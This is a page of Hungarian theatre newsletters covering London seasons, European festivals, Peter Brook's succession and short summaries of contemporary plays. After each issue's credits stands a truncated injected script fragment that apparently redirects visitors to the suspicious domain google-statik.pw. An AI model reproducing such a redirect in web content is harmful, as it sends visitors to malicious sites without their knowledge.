A londoni National Theatre a 2009-es oszi evadban szamos uj bemutatot kinal. Musorra tuztek Terry Pratchett Nation cimu, egy cunami tuleloirol szolo muvet Mark Ravenhill adaptaciojaban, Melly Still rendezeseben. Lathatjuk majd Alan Bennet uj, meg cim nelkuli dramajat WH Auden es Benjamin Britten baratsagarol, a rendezo Nicholas Hytner. Ferdinand Bruckner The Pains of Youth cimu darabjat Katie Mitchell rendezi: egy csapat alberlo diak tortenete, akik a szex es a halal megszallottai. A gazdasagi valsag ellenere a szinhaz 93%-os nezettseget ert el a mult felevben; egyes kiserleti vasarnapi eloadasok nezettsege folyamatosan 100%-os volt, ezert 2009. juliusatol allandositjak a kiserleti eloadasokat. A National Theatre junius 25-etol olyan kiserleti eloadassorozatot indit, ahol Racine Phaedrajat eloadasban folveszik, es az orszag otven mozijaban vetitik majd a produkciot, valamint tovabbi szaz moziban es muveszeti kozpontban vilagszerte. Igy lehetove valik, hogy a szinhazi eloadas utan 24 oraval szazotven helyszinen elvezhessek a nezok a darabot. A foszerepben az Oscar-dijas Helen Mirren lathato.

1.3. Theatre503 - Tavaszi evad

A londoni Theatre503 bejelentette tavaszi musorat. A 2008-ban ismetelten Peter Brook Empty Space Awardra jelolt szinhaz a mult evben 300%-kal novelte a nezoinek szamat. Januar 27-en mutattak be Fraser Grace uj, februar 21-ig lathato The Lifesavers cimu darabjat Paul Robinson rendezeseben. A szorakoztato thriller egy olyan onpusztito tarsadalomrol szol, amelyben az elet fenntartasaert a gyerekeket elveszik a szuleiktol, es a szenatus neveli fel oket sajat vedelmuk erdekeben. Marcius 2-tol 28-ig jatsszak Jane Brodie Hallelujah cimu komediajat egy angol no, egy ir no es egy ingatlanugynok osszezartsagarol egy lerobbant hotelben, ahol a TV csak egy csatornat fog, az ablakok nem nyilnak, es egyikuknek sincs penze a minibarra (rendezo: Gemma Fairlie). Aprilis 14-tol majus 9-ig lesz musoron Orlando Wells anarchisztikus es varatlan fordulatokkal teli darabja, a Tin Horizon Phoebe Barran rendezeseben. Vlagyimirnek gondjai vannak. A szolgalok nem figyelnek ra, az exnoje vissza akar jonni hozza, kitomott allat uzlete felkeltette a rendorseg erdeklodeset, sot az se kizart, hogy a Messias mindjart beallit hozza reggelire.

1.4. Chichester Fesztival 2009

A Chichester Fesztival 2009-ben egy honappal tovabb tart es ket eloadassal tobb lesz a musoran, mint az eddigi evekben. A fesztival marciusban kezdodik, es az elso negy produkcio cimet mar bejelentettek. Marcius 11-tol aprilis 11-ig a Minerva Szinhazban lathato Simon Grey es Hugh Whitemore The Last Cigarette cimu darabja Richard Eyre rendezeseben. Az adaptacio tavaly nyaron keszult el Simon Grey memoarjaibol, eppen a halala elott. Majd aprilis 9-tol majus 2-ig jatsszak Noel Coward Hay Fever-jet a Fesztival Szinhazban, a rendezo Nikolai Foster. Ronald Harwood Taking Sides cimu dramajat Philip Franks rendezi, es aprilis 28. es majus 16. kozott nezhetik meg az erdeklodok. Szinten o rendezte a Taking Sides pardarabjat, a majus 1-tol 16-ig megtekintheto Collaborationt. A tortenet 1931-ben kezdodik, remenyteljes hangulatban, amikor Richard Strauss es Stephan Zweig megkezdik muveszi egyuttmukodesuket. A foszerepben Michael Pennington es David Horovitch.

1.5. Theatre Mania 1 - Linz

Linzben, 2009 Europa Kulturalis Fovarosaban januar kozepen rendeztek meg a Theatre Mania 1 nevu, nagyszabasu nemzetkozi szinhazi es tancfesztivalt. A programok es helyszinek egyarant valtozatosak: a Landestheater, a Posthof, es a linzi kikotoben talalhato Hafenhalle09 adott otthont a haboru es diktatura, integracio, migracio es igazsagkereses kerdeseivel foglalkozo, helyi es nemzetkozi szintu problemakat megfogalmazo eloadasoknak.

Az argentin Constanza Macras a Hell On Earth cimu, januar 24-en es 25-en lathato produkciojahoz fiatalokat toborzott Berlin Neukolln nevu keruletebol. A darab a felnotte valas nehezsegeirol szol egy olyan kozegben, ahol 150 ezer ember el egyutt a vilag 160 orszagabol a bevandorlas es diszkriminacio minden kihivasaval. Az Acco Theater Center januar 30-an bemutatott Wishuponastar & An Arab Dream cimu eloadasa kiemelkedo jelentosegu kortars izraeli tarsadalmi drama, ami elsosorban az arab es izraeli muveszek kozotti szovetseg kialakitasara torekszik. A fesztival programjaban szerepel Betty Shamieh Territories cimu darabjanak nemet nyelvu osmebutatoja, valamit az antwerpeni Toneelhuis Szinhaz Triptych of Power cimu harom reszes produkcioja Guy Cassiers rendezeseben.

1.6. Gate Theatre, London: Generation Gate

A londoni Gate Theatre aprilistol juliusig tarto, Generation Gate nevu szezonjaval megalapitasanak harminceves evfordulojat unnepli 2009-ben. A Natalie Abrahami es Carrie Cracknell muveszeti vezetese alatt allo szinhaz aprilis 21-tol majus 16-ig tuzi musorra az unnepelt spanyol dramairo, Juan Mayorga Nocturnal cimu darabjat David Johnston forditasaban, Lyndsey Turner rendezeseben. Ket ferfi ugyanabban a haztombben lakik. Az egyik a hosszu setakat, a gorog mitoszokat es az idegen nyelveket szereti. A masik a listakeszitest, bicikliszerelest es a zsarolast. Egy napon varatlanul osszetalalkoznak egy kocsmaban. Csakhogy ez megsem egeszen a veletlen muve. Egyikuk ugyanis reges regen eltervezte ezt a pillanatot. A Nocturnal a baratsag komplex termeszeterol szol, es azt kutatja, hogy az udvarias viselkedes retegei mogott milyen hatalmi harcok zajlanak az emberi kapcsolatokban. Majus 28. es 30. kozott lathato a Sadler's Wells-ben Pierre Rigal Press cimu darabja a Gate koprodukciojakent. A francia koreografus, Pierre Rigal munkaja megmutatja, hogy a modern vilag hogyan nyomja ossze szemelyes terunket, es mindezt kepzeljuk el egy specialisan leszukitett, alig harom es fel meter szeles szinpadon. A Gate es a Headlong Theatre junius 21-tol julius 18-ig jatssza Euripidesz Medeiajanak ujragondolt valtozatat Dylan Tighe rendezeseben. A produkcio az elo eloadas es az elore felvett kepek egyuttes szovetebol epitkezik, es a forditas es szinhaz termeszetet kutatja, valamint a mitosz helyet keresi a mai tarsadalomban.

1.7. Nemzetkozi elismeres Schilling Arpadnak

Az Europai Szinhazi Dijat 1986 ota nemzetkozi bizottsag iteli oda az arra meltonak itelt jeloltnek. 2009-ben Krystian Lupa kapja a kituntetest. Az eddigi dijazottak kozott szerepel tobbek kozott Ariane Mnouchkine, Peter Brook, Harold Pinter, Robert Wilson es Pina Baush. A nagyszabasu dijatado unnepseget eddig Taorminaban, Torinoban es Thessalonikiben rendeztek, de 2009-ben a Grotowski Evre valo tekintettel - az Europai Szinhazi Dij torteneteben eloszor - Lengyelorszagban lesz az esemeny, a marcius 31. es aprilis 5. kozott tartando Premio Europa per il Teatro fesztival alatt. Schilling Arpad jelentos nemzetkozi elismeresben reszesul, ugyanis a negy masik dijazott mellett neki iteltek az Uj Europai Szinhazi Valosag Dijat, amivel az ujdonsagot jelento kezdemenyezeseket jutalmazzak. A dijatadas galaestjet Krystian Lupa bemutatoja koveti, amelyet a dijazottak tevekenysegehez kapcsolodo nyilvanos kerekasztal-beszelgetesek, interjuk, munkabeszamolok eloznek meg.

2. Kortars drama

2.1. Gillian Plowman: The Window Cleaner (Az ablaktisztito)

Az 1941-ben szuletett kortars brit irono, Gillian Plowman dramai egyszerre kepesek erzekeny temak, fontos kerdesek osszetett felvetesere, es arra, hogy az olvasot egyedi humorral szorakoztassak. Egyfelvonasosait es egesz estes dramait folyamatosan jatsszak fesztivalokon, egyetemeken es a Fringe-en. Jelenosebb darabjai: Crooked Wood (bemutato: King's Head Theatre, London, 1991), Destinies (bemutato: Old Red Lion Theatre, London, 1999) Yours Abundantly, From Zimbabwe (bemutato: Oval House Theatre, London, 2008).

Szereplok: 1 no / 1 ferfi

Jill megolte a ferjet, aki bantalmazta ot, es most szabadult a bortonbol. Hogy ujrakezdhesse az eletet, ablaktisztitast vallal egy elegans lakasban, amig a tulajdonosok nincsenek otthon. Pechjere, eppen egy betores kozepebe csoppen, es megzavarja a betorot, Darylt, aki bepanikol, es tuszul ejti a lanyt. De Jill ugyesen beszeltetni kezdi a ferfit arrol, hogyan valt bunozove. Kiderul, hogy Darylt elhagyta a felesege, es magaval vitte a kozos lanyukat, amit a ferfi nem tud feldolgozni. Cserebe Jill elmeseli ferje halalanak tragikus tortenetet, hogy a gyereket, akit a bortonben kellett megszulnie, azonnal elvettek tole, es adoptaltak. Kiderul, hogy ennek a ket embernek van mirol beszelnie - a darab vegere szovetsegesekke valnak, valoszinutlen kapcsolatuk melyen megszuletik a jovo es a remeny.

A mu egyutterzessel, de mereszen nez szembe a kapcsolaton beluli eroszak temajaval, valamint azzal, hogy a bortonbol szabadulok milyen nehezsegekkel szembesulnek, ha ujra akarjak kezdeni az eletuket a vilagban.

2.2 Sebastien Thiery: Cochon d'Inde

Sebastien Thiery szinesz es dramairo 1970-ben szuletett Parizsban. A parizsi Szinmuveszetin, ahol 1993-ban kapott diplomat, Dominique Valadie, Catherine Hiegel, Philippe Adrien tanitvanya volt. Ezutan kulonbozo szinhazaknal jatszott es kisebb-nagyobb filmszerepet is kapott. Eddigi darabjai: Sans ascenseur (Lift nelkul), amelyet 2004-ben Jean-Michel Ribes rendezeseben mutatott be a Theatre du Rond-Point, masik darabjat, Dieu habite Dusseldorf (Isten Dusseldorfban el) cimut ugyszinten az Avant-scene kozolte.

Az Avant-Scene 2008. december 15-i szama kozli Cochon d'Inde cimu darabjat, amelyet 2009 elejen mutat be a parizsi Hebertot Szinhaz Anne Bourgeois rendezeseben. Az eloadasban a szerzo maga is jatszik.

Szereplok: 3 ferfi, 2 no

A darab foszereploje Alain Kraft, egy szereny korulmenyek kozott nevelkedett, feltorekvo, egyedulallo, otvenes ferfi. Mit sem sejtve, szokasos rutinjanak megfeleloen a bankjaba megy, hogy penzt vegyen fel, de az alkalmazott ezt megtagadja tole, sot, el sem hagyhatja a helyiseget. A ferfi nem ert semmit, es az igazgatonal ohajt panaszt tenni. Hiaba. Aprankent kiderul, hogy igen rovid ido alatt gazdat cserelt a bank. Indiaiak vettek meg, akik otthonrol iranyitjak az uzletet. Az idoeltolodas miatt azonban Kraftnak nincs modja beszelni veluk. De arra is feny derul, hogy az uj fonokseg „figyelemmel kiserte" ugyfeluk szamlajat. Velemenyuk szerint Kraft ertelmetlenul sokat koltott ruhazkodasra es ettermekre, es szerintuk ez az osszeg hosszabb ideig fedezhetne egy indiai csalad etkezeset. Ez az abszurd alaphelyzet adja meg a farce mufajaba tartozo darab humorat.

3. Felhivas, palyazat, informacio

3.1. „Teatro del Mundo en Argentina 2009"

A 2006-ban, az argentin szinhazi torveny alapjan letrehozott Nemzeti Szinhazi Intezet azt a feladatot kapta, hogy kulfoldi szinhazi, tancszinhazi produkciok szamara lehetove tegye bemutatkozasukat. Ez nemcsak azt jelenti, hogy a nemzetkozi rangu fesztivalon jatszhatnak a kivalogatott tarsulatok, hanem orszagos turnet is szerveznek szamukra.

A jelentkezeseket 2009. majus 15-ig kell bekuldeni, es ezt kovetoen egy bizottsag valasztja ki az eloadast.

Feltetelek: az utazas es szallitas koltsegei a tarsulatot terhelik, a helyi koltsegeket az argentin fel vallalja.

Jelentkezesi feltetelek: a teljes eloadas egy kameras DVD felvetele, amelyen fel kell tuntetni az orszag, a tarsulat, a drama irojanak nevet es a darab cimet.

Tovabbi felvilagositasert forduljon az ITI Magyar Kozpontjahoz.

Keszitette: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
OSZMI-ITI HÍRLEVÉL 2008. december

OSZMI-ITI HIRLEVEL 2008/12.

1. Hirek

1.1. Peter Brook 2010-ben atadja a stafetabotot

1.2. Peter Brook beszede az ures terrol

1.3. VICTORIA & ALBERT MUSEUM - szinhazi kiallitas

1.4. Regine Chopinot legujabb koreografiaja a Centre Pompidou-ban

1.5. August Stramm harom rovid darabja Parizsban

1.6. Patrice Chereau Marguerite Duras szoveget rendez Nanterre-ben

1.7 National Theatre London - David Hare felolvas

1.8. Osbemutato a berlini Schaubuhneben - Mayenburg: A ko

2. Kortars drama

2.1. Philippe Claudel: Parle-moi d'amour (Meselj nekem a szerelemrol)

2.2. Norman Robbins: Prescription for Murder /Gyilkossag receptre

3. Felhivas, palyazat, informacio

3.1. Felhivas a Tanckutatas 23. Vilagkongresszusan valo reszvetelre

3.2. Az International Physical Theatre Laboratory felhivasa muhelymunkara

3.3. Lett szinhazi showcase

3.4. Alternativ Szinhazak Fesztivalja

1. Hirek

1.1. Peter Brook 2010-ben atadja a stafetabotot

Peter Brook 1974 ota iranyitja a Bouffes du Nord szinhazat Parizsban. Egy romhalmazt valtoztatott a vilag szinhazi kozpontjava, ahol az evtizedek alatt sorra mutatta be legendassa valt eloadasait, az Atheni Timont, a Mahabharatat, a Carment, a Hamletet. A Le Monde 2008. december 13-i szamaban olvashato cikk szerint Brook 2010-ben tavozik szinhaza elerol, de addig Micheline Rozannal egyutt elokeszitik, hogy Olivier Mantei (43) es Olivier Poubelle (48) zokkenomentesen atvehesse az iranyitast.

Olivier Mantei jelenleg az Opera-Comique igazgatohelyettese es a Bouffes du Nord zenei programjaiert felelos. Olivier Poubelle szinhazi vallalkozo, aki a legkulonbozobb szinhazakkal dolgozik egyutt, emellett kivalo ismeroje a nepzenet, vilagzenet jatszo egyutteseknek is.

A Bouffes du Nord olyan maganszinhaz, amely teljes fuggetlenseget elvez, ami koszonheto egyreszt annak, hogy evente kb. 150 000 euro jon be teremberletbol, valamint az allami tamogatasbol, amely evente 1, 2 millio euro bevetelt jelent.

Brook a stafetabot atadasaval nem csak a folyamatossagot szeretne biztositani, hanem a szinhaz megujulasaban is remenykedik. Egy cseppet sem tart attol, hogy ugynevezett „szinhazi vallalkozok" veszik at az iranyitast, mivel Mantei es Poubelle sokkal szelesebb latokoru, a kulonbozo mufajokat jol ismero szinhazi ember. Brook kifejezett ohaja, hogy a zene, a zenes szinhaz jelentos szerephez jusson a Bouffes du Nord-ban, annal is inkabb, mert az epulet kifejezetten jo adottsaggal rendelkezik. Kozos meggyozodesuk, hogy olyan eloadasoknak kell helyt adni, amelyben jol megfer egymassal, jol kiegesziti egymast a nepzene, a szinhaz vagy a tanc egy produkcion belul is, es azt remelik, hogy uj muveszi formak johetnek igy letre.

Felvetodott ugyan, hogy alkotomuveszekre bizza a folytatast, de keves az olyan muvesz, aki meg tud felelni ennek, aki kepes a melto folytatasra. Akik szoba johetnek, mint peldaul Joel Pommerat vagy Stephane Braunschweig, mar elkotelezodtek mashol.

Peter Brook legkozelebbi tervei kozott szerepel az, hogy 2009. tavaszan Shakespeare szonettjeit allitja szinpadra, osszel pedig a Tierno Bokar angol valtozatat. 2010-ben pedig Mozart: Varazsfuvolajanak egy bensoseges, maga altal keszitett adaptaciojat rendezi meg. Arra a kerdesre pedig, hogy abbahagyja-e a szinhaz-csinalast, Brook azt valaszolja: „Ez olyan, mintha azt kerdezne tolem, hogy hany eves koromig akarok elni. Ez nem tolem fugg."

1.2. Peter Brook beszede az ures terrol

Peter Brook beszede az Empty Space Awards 2008 dijatado unnepsegen:

Nemreg egy hires kritikus, aki talan koztunk van ma este, azt irta egy uj londoni eloadasomrol: „Ahogy belepunk a szinhazba, ures teret latunk. Aasitunk." En mindig komolyan vettem a kritikusokat, de most megis azert gyultunk ossze, hogy dijakra meltassuk ezeket az ures tereket. Eljott az ido, hogy ismet megvizsgaljuk ezt a ket egyszeru szot.

Az ures ter kezdetben az a hely volt, ahol jatsszunk: a „jatszo-terunk". Majd a hagyomany es jol bevett szokasok zavart keltettek: a ter tele lett kepekkel, diszekkel, folosleges butorokkal es kellekekkel. Ezek gatoltak a kepzelet szabadsagat. A ur a szinpadon kiindulopont volt, de nem oncelu - mindig ujra raebreszt minket, hogy mi a legnelkulozhetetlenebb segitseg ahhoz, hogy a szineszi jatek es jelenlet gazdagsaga feltarulhasson.

Ugyan mara mar megnyertuk ezt a csatat, most a szinpadi hang-es fenytechnikaval folyik a harc. A zavar meg rejtettebb - magan az anyagon es a szineszen belul kell keresni. Harag, eroszak, hiszteria, undor es ketsegbeeses - ezek az erzesek olyan valodiak, hogy ki kell oket fejezni, erovel, szenvedelyesen. De a feny a koromfekete kepernyon csak a feketeseget tukrozi vissza. Az ures teret az ellentetben kell keresni - a szinpadi szoveg es a csend ellenteteben.

Az ur ma kenyelmetlen kihivas rendezonek, ironak, szinesznek egyarant. Azon kivul, amit az ember gondol, hisz es ki akar fejezni, nyitva hagyhato-e a ter? Zarojelbe tett szunetek es csendek tagoljak Beckett szindarabjainak minden oldalat. Csehov harom ponttal jelolte azt a tartomanyt, ahol a kifejezhetetlen megjelenhet. Shakespeare helyet hagyott minden egyes sora utan. A szinhaz azert van, hogy a ki-nem-mondott lelegezni tudjon es hallhatova valjek: egy olyan eletminoseget tesz tapinthatova, amitol tetje lesz a kuzdelemnek. Az ur legmeltobb kifejezoje a csend. A szinhazban vannak olyan rendkivuli pillanatok, amikor szinesz es nezo melyen, kozosen megel valamit - es csend lesz. Ez a ritka alkalom a valodi ures ter.

1.3. VICTORIA & ALBERT MUSEUM - szinhazi kiallitas

A londoni Victoria & Albert Museum 2009. marciusaban uj szinhazi kiallitas megnyitasat tervezi. A tarlat szamos anyagot bemutat a jelenleg zarva tarto Theatre Museum gyujtemenyebol: az elmult 350 evbol fennmaradt mintegy 250 targyat az eloadomuveszet minden teruleterol. Az erdeklodok megtekinthetik tobbek kozott Shakespeare dramainak elso, 1623-as kiadasat; az egyetlen sugopeldanyt, ami Handel eletebol fennmaradt; Richard Brinsley Sheridan Ragalom iskolaja cimu komediajanak egy korai keziratat; John Osborne Duhongo ifjusaganak eredeti, Royal Court Theatre-beli plakatjat 1957-bol. Kiallitjak hires szineszek, peldaul Richard Burton, Laurence Olivier es Vivien Leigh jelmezeit, es interjukat lathatnak az alabbi alkotokkal: Michael Frayn, Peter Hall, Peter Brook es Henry Goodman.

1.4. Regine Chopinot legujabb koreografiaja a Centre Pompidou-ban

Chopinot legujabb eloadasanak cime: Cornucopiae, aminek jelentese: bosegszaru. A Liberation kritikusa nem igazan erti a cimadast, mivel szerinte nincs semmi rendkivuli gazdagsag az eloadasban, bar Jean-Michel Bruyere jelmezei es a szcenografiaja nagyszeruek. Chopinot ezzel a produkcioval minden bizonnyal egy korszak veget jelzi, hiszen lejar kinevezese a Centre National de La Rochelle elen, es palyajat a Cornucopiae elnevezesu fuggetlen tarsulat vezetojekent folytatja.

A szinpadon egy ketszarvu, doglott allat fekszik, a nyolc tancos - koztuk Regine Chopinot - egy egyszeru, eszkoztelen ritualis tancot jar. Mind egyforma jelmezt, mondhatni uniformist viselnek, amely eltakarja az arcukat. Az eloadas, amely tobb nezot is alomba ringat, megis az ellenallas szimboluma egy vesztes utkozetben.

1.5. August Stramm harom rovid darabja Parizsban

Az idei Avignoni Fesztivalon mutattak be August Stramm harom rovid darabjat, amelyet most december 14-tol lathat ujra a kozonseg Theatre de la Cite Internationale-ban(Parizs). Stramm (1874-1915) a Franciaorszagban kevesse ismert nemet kolto es dramairo fiatalemberkent a nemet Postaugyi Miniszteriumban dolgozott, majd katonai szolgalata leteltevel tobbszor tett hosszabb-rovidebb utazast az Egyesult Allamokba, s csak ezutan telepedett le Berlinben. Az elso vilaghaboru egyik utkozeteben halt meg Horodecnel. A nemet szerzo az expresszionizmus egyik elso elofutara.

Ket francia rendezo, Daniel Jeanneteau es Marie-Christine Soma egyseges stilust adott a Feux (Tuzek) osszefoglalo cimen jatszott harom darabnak. Az elso komediaban egy nem igazan osszeillo hazaspar felriad almabol, s igy menekulnek meg a fulladasos halaltol, mivel egyikuk az elozo este nyitva hagyta a gazcsapot. Ujrakezdhetik az eletet, vagyis folytathatjak a veszekedesuket ott, ahol abbahagytak, mit sem torodve az ejszaka folyaman „odapottyant" bebivel. A masodik darab foszereploje egy asszony, aki gyilkossaggal reagal arra, hogy a kornyezete, a csaladja annyira behalozza, hogy szinte levegot sem kap. A harmadik muben a hatalom, a szerelem es a halal erotikus tancat jarjak a polgari kornyezetben elo szereplok.

1.6. Patrice Chereau Marguerite Duras szoveget rendez Nanterre-ben

Patrice Chereau nem Duras egy darabjat allitotta szinpadra, hanem az irono naploszeru elbeszeleset rendezte meg. A kivalasztott szoveg azt a pillanatot ragadja meg, amelyben Duras remenykedik deportalt ferje hazatereseben. Az Europat kinzo fasizmus, nacizmus pontos elemzeset adja. Az alkotok celja, hogy atadjak, atelhetove tegyek a haboru, a taborok borzalmait.

A szinpadon asztal es egyszeru, kenyelmetlen szekek lathatok. Dominique Blanc e targyak kozott „orlodik", arcan hol a varakozas, hol a duh, hol a turelmetlenseg, ketsegbeeses erzese jelenik meg. A szineszno oszinte, egyszeru jateka nagy alazattal szolgalja Duras irasat.

1.7. National Theatre London - David Hare felolvas

David Hare felnottkora ota sokat latogatja Berlint, Europa egyik legizgalmasabb helyet. De Hare szerint van a varos karaktereben valami megfejthetetlen, emiatt ugy erzi, hogy Berlin mindig kicsuszik a kezei kozul. A Fal leomlasanak huszadik evforduloja alkalmabol 2009. februarjaban es marciusaban a londoni National Theatre programjakent Hare egy 55 perces elmelkedest olvas fel Nemetorszag ujraegyesitett fovarosarol - arrol, hogy mit jelent Berlin az europai tortenelem szamara es a szerzo sajat eleteben. „Valamennyi brit dramairo kozul Hare-t erdekelte mindig is a legjobban, hogy mi zajlik korulotte a vilagban, ezert annyira keresett ujsagirokent is" - irja rola a Guardian szinhazkritikusa, Michael Billington.

1.8. Osbemutato a berlini Schaubuhneben - Mayenburg: A ko

2008. december 22-tol 2009. januar 28-ig lathato Marius von Mayenburg A ko cimu dramaja Ingo Berk rendezeseben a berlini Schaubuhneben. Az eloadas a Schaubuhne, a Salzburgi Unnepi Jatekok es a Young Director's Project koprodukciojaban valosul meg. 1993-at irunk. Heidrun Heising vegre hazaterhet drezdai szulohazaba anyjaval, Withaval es lanyaval, Hannaval. A csaladnak ujra kell kezdenie az eletet. De a bekoltozessel Heidrunban es Withaban felebrednek regi eletuk donto fordulopontjainak emlekei is: 1935-ben Heidrun apja, Wolfgang Heising egy Swarzmann nevu zsido csaladtol veszi meg a drezdai ingatlant, de a tulajdonosvaltas nem hozott szerencset se a csaladnak, se a haznak: 1945-ben ostrom ala kerult, es Wolfgang eletet vesztette. Witha es Heidrun 1953-ban elmenekulnek az NDK-bol, maguk mogott hagyva a hazat es a multat. Az epizodok idougrasokkal kovetik az emlekezok parbeszedet, anyjat es lanyat, ahogy ujrairjak csaladjuk tortenetet.

2. Kortars drama

2.1. Philippe Claudel: Parle-moi d'amour (Meselj nekem a szerelemrol)

Philippe Claudel 1962-ben szuletett, regeny- es filmforgatokonyv-iro. Les Ames grise (Fako lelkek) cimu regenyevel 2003-ban jelentos francia irodalmi dijat nyert. Muvebol maga keszitett filmforgatokonyvet, amelyet hasonlo cimmel rendezett meg Yves Angelo. Eddig egy sajat filmet keszitett, az Il y a longtemps que je t'aime (Regota szeretlek ) cimmel. Elso szindarabjat nagy sikerrel mutatta be 2008. oktober elejen a Comedie des Champs Elysees (Parizs).

Szereplok: 1 no, 1 ferfi

A Labiche es Feydeau nyomdokaiban jaro komedia foszereploje egy, az otvenes eveiben jaro par, ket felnott gyerek szulei. Nincs titkuk egymas elott, megeltek jo es rossz pillanatokat, es a masik legkisebb hibaja sem keruli el a figyelmuket. A hazaspar egy vendegsegbol ter haza. A ferfit pillanatnyilag csak az izgatja es erdekli, vajon eloleptetik-e a munkahelyen vagy sem. Szavakkal kinozza a feleseget, amiert a vacsora alatt az egyik vetelytarsaval tarsalgott. Ezzel kezdodik a veszekedesuk, amelynek soran minden szoba kerul, az oregedes, a szexualitas, a hazugsagok, a gyerekneveles, stb. Ez a komedia nem mas, mint egy rettenetes, megis mulatsagos veszekedes.

2.2. Norman Robbins: Prescription for Murder /Gyilkossag receptre

Norman Robbins Yorkshire-ben szuletett a harmincas evek kozepen. Eloszor haromeves koraban lepett szinpadra egy olyan darabban, amelyben a Swenney Todd alakitasaval hiresse valt Todd Slaughter szinesz jatszotta a foszerepet. Kesobb eveket dolgozott az Amdram szinhazban, ahol pantomimekben es musicalekben lepett fel. Norman Robbins hossszabb ideig a Yorkshire-i Evening Post munkatarsa volt, mielott Birminghamben dramaiskolaba iratkozott volna be. Professzionalis szinhazi karrierjet 1965-ben a Hippodrome Theatre-ban kezdte, es vagy tizenot even keresztul a show business kivalosagaival egyutt szerepelt. Szabadidejeben dramakat, pantomime scripteket, a televizio szamara pedig forgatokonyveket irt. Szamos pantomim scriptjet maga is rendezte, a Hamupipoke, valamint az Aladdin pantomim valtozatat New Yorkban is nagy sikerrel jatszottak.

Szereplok: 4 no, 3 ferfi

A darab cselekmenye egy eszak devoni haz nappalijaban jatszodik. A latszolag nyugodt kisvarosban, Bere Kinghtonban az otven koruli Dr Richard Forth soha egy pillanatra sem unatkozik. Nem csak azert nem, mert rengeteg a munkaja, es ex-baratnojevel is nagyon feszult a kapcsolata, hanem a harmincas eveiben jaro felesege, Barbara allando betegsege is aggasztja. Raadasul senki sem tudja mi az asszony baja. Amikor egy idegen, a negyvenes szamitogep kereskedo Eric Dawson felbukkan, nagy zavar tamad amiatt, hogy a ferfi azt allitja, hogy ismerte Richard masodik menyasszonyat, akinek letet a ferj termeszetesen tagadja. Barbara egeszsegi allapota egyre rosszabbra fordul, de nem csak az ove. A szerencsetlenseg ugyanolyan gyorsan terjed, mint a rossz hir, es ugy tunik, hogy valaki meg akarja olni Barbarat......

3. Felhivas, palyazat, informacio

3.1. Felhivas a Tanckutatas 23. Vilagkongresszusan valo reszvetelre

A Tanckutatas 23. Vilagkongresszusat 2009. julius 1. es 5. kozott rendezik meg Athenban, es tancmuveszek, osztalyok, kutatok, eloadok, kiallitasi anyagok jelentkezeset varjak.

Tovabbi informacio: www.orchesis-portal.org/cdr

3.2. Az International Physical Theatre Laboratory felhivasa muhelymunkara

Szergej Osztrenko vezetesevel az International Physical Theatre Laboratory workshopot tart a szloveniai Bovec-ben 2009. julius 1. es 12. kozott.

Tovabbi informacio: http://www.iugte.com/projects/performers.physicality.php

3.3. Lett szinhazi showcase

A lettorszagi Uj Szinhazi Intezet valamint a lett fuggetlen es repertoarszinhazak egyuttmukodeseben valosul meg a Lett Szinhazi Showcase 2009. marcius 12. es 15. kozott Rigaban. A programban angol felirattal lathatoak lesznek az evad legigeretesebb rendezesei es tarsulatai, kortars drama, tanc es babszinhaz.

Jelentkezes, kapcsolat: www.theatre.lv/new/en, This e-mail address is being protected from spambots. You need JavaScript enabled to view it , This e-mail address is being protected from spambots. You need JavaScript enabled to view it

Tel: +37167212631

Fax: +37167212471

3.4. Alternativ Szinhazak Fesztivalja

A szlovakiai ACTORES Town Theatre TEMPUS ART 2009 neven nemzetkozi alternativ szinhazi fesztivalt rendez Roznava varosaban 2009. szeptember 6. es 12. kozott.

Jelentkezesi hatarido: 2009. februar 28.

Kapcsolat: www.tempusart.sk

This e-mail address is being protected from spambots. You need JavaScript enabled to view it
www.actores.sk

Tel: +421 58 7329623
Fax: +421 58 7884240
Mobil: +421 905 560526

Keszitettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
<< Start < Prev 11 12 13 Next > End >>

Page 11 of 13